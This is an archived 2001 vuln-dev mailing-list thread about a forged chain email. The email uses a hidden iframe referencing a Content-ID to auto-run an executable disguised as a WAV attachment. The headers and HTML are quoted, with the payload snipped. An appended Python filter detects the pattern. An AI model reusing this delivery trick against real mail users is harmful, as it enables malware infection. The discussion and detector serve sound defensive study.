Vulnerability Development mailing list archives
RE: A very dangerous mail...
From: Aidan O'Kelly <okelly () xnet ie>
Date: Mon, 23 Jul 2001 15:42:40 +0100
'Microsoft IE MIME Header Attachment Execution Vulnerability'

It was discovered a couple months ago. If it was an exe it would have run, although since it asked you whether you want to save it or run it, it means your system is patched anyway.

Explanation and example. http://www.kriptopolis.com/cua/eml.html

-----Original Message-----
From: Marius Huse Jacobsen [mailto:mahuja () c2i net]
Sent: 20 July 2001 22:24
To: vuln-dev () securityfocus com
Subject: A very dangerous mail...

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Edited to protect any innocents.
Obvious forgery (supposedly from microsoft.com)

I'm using ZoneAlarm MailSafe -> .exe changed to .zl9
It tries to start the attachment exe automatically (Outlook Express)
- - it asks me if I want to save or start the zl9 file but I don't know what it would do to an exe.

Exactly how bad is it?

The offending line seems to be
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>

Html email was a curse to begin with and it hasn't become any better.
Can anyone give me that ascii ribbon sig?

8< --------- Start offending letter -----------

Return-Path: <zina () somewhereonthenet com>
Received: from smtp08.somewhereonthenet.com (smtp08.somewhereonthenet.com [196.*.*.*])
    by mail.my_isp.com (8.9.3/8.9.3) with ESMTP id PAA16304
    for <my () mail addy>; Sat, 14 Jul 2001 15:10:00 +0200 (MET DST)
Received: from microsoft.com ([196.*.*.*])
    by smtp08.somewhereonthenet.com (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10)
    with SMTP id <0GGG009BGSJHYE () smtp08 iafrica com>
    for my () mail addy; Sat, 14 Jul 2001 15:09:40 +0200 (SAT)
Date: Sat, 14 Jul 2001 15:09:01 +0100
From: Lynda () smtp08 somewhereonthenet com
Subject: Fw: 100,000 lemmings can't be ...
To: removed () smtp08 somewhereonthenet com
Message-id: <0GGG009BISJHYE () smtp08 somewhereonthenet com>
MIME-version: 1.0
Content-type: multipart/mixed; boundary="nymph"

This is a multi-part message in MIME format.

- --nymph
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
<P align=center><FONT size=7><SPAN class=590014113-13042001>SMACK!!!</SPAN></FONT></P>
<P align=center><FONT size=7><SPAN class=590014113-13042001>You have been hit</SPAN></FONT></P>
<P align=center><SPAN class=590014113-13042001>This is the funny-attachment war! You have just been hit and by the rule book you can't hit this person back. To be in the game you need to send this message to five of your friends, try to find some small and funny attachment to send along. If you don't have time use the one you got hit by, go ahead hit someone!</SPAN></P>
<P align=center><FONT size=7><SPAN class=590014113-13042001></SPAN></FONT> </P></BODY></HTML>

- --nymph
Content-Type: audio/x-wav; name="setup.zl9"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>

<snip .exe content>

- --nymph
<snip fortune.zip>
- --nymph--

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.4

iQA/AwUBO1ihZUcYTo91XF1EEQImJgCg5UccaNK/H1g27tAzUm23TayOfpQAnjDk
sqjAlFfiJIKdd21U6wxArNXb
=63JI
-----END PGP SIGNATURE-----

_________________________________________
Aidan O'Kelly
Systems Administrator
okelly () xnet ie
Xnet - The Data Storage People
Dublin: +353 (1) 2740 100
Belfast: +44(28) 9073 5872
www.xnet.ie | storage () xnet ie

*******************************************************************
Privileged/Confidential Information may be contained in this message. If you are not the addressee indicated in this message (or responsible for delivery of the message to such person), you may not copy or deliver this message to anyone. In such case, you should destroy this message and kindly notify the sender by reply email. Please advise immediately if you or your employer do not consent to Internet email for messages of this kind. Opinions, conclusions and other information in this message that do not relate to the official business of Xnet and shall be understood as neither given nor endorsed by it.
********************************************************************
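
Added example, not part of the original thread or written by either poster: a mail-filter style check for the pattern visible in the quoted letter, where an HTML part's iframe references another part by Content-ID and that part is declared as a media type but carries an executable file name. The function name, the extension list and the sample message (modelled on the letter, with setup.exe as the name before MailSafe renamed it) are assumptions made for illustration.

```python
import email
import re
from email import policy

# Extensions treated as executable here (an assumption; extend as needed).
EXEC_EXT = {"exe", "com", "scr", "pif", "bat", "cmd", "vbs"}
IFRAME_CID = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?cid:([^\s\"'>]+)", re.I)

def find_auto_exec_parts(raw):
    """Return (content_id, declared_type, filename) for each MIME part that an
    HTML <iframe src=cid:...> references, that is declared as a non-application
    type, and whose file name has an executable extension."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    by_cid, referenced = {}, set()
    for part in msg.walk():
        if part.is_multipart():
            continue
        cid = str(part.get("Content-ID", "")).strip().strip("<>").lower()
        if cid:
            by_cid[cid] = part
        if part.get_content_type() == "text/html":
            # get_content() undoes quoted-printable, so "src=3Dcid:" becomes "src=cid:"
            html = part.get_content()
            referenced.update(c.lower() for c in IFRAME_CID.findall(html))
    hits = []
    for cid in sorted(referenced & by_cid.keys()):
        part = by_cid[cid]
        name = part.get_filename() or ""  # falls back to Content-Type name=
        ext = name.rpartition(".")[2].lower() if "." in name else ""
        if ext in EXEC_EXT and part.get_content_maintype() != "application":
            hits.append((cid, part.get_content_type(), name))
    return hits

# Constructed sample modelled on the quoted letter; "AAAA" stands in for the payload.
SAMPLE = b"""\
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="nymph"

--nymph
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<BODY><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></BODY>
--nymph
Content-Type: audio/x-wav; name="setup.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>

AAAA
--nymph--
"""
```

The check keys on the combination of the three signals rather than any one of them, so an ordinary inline image or a plainly attached .exe is not reported.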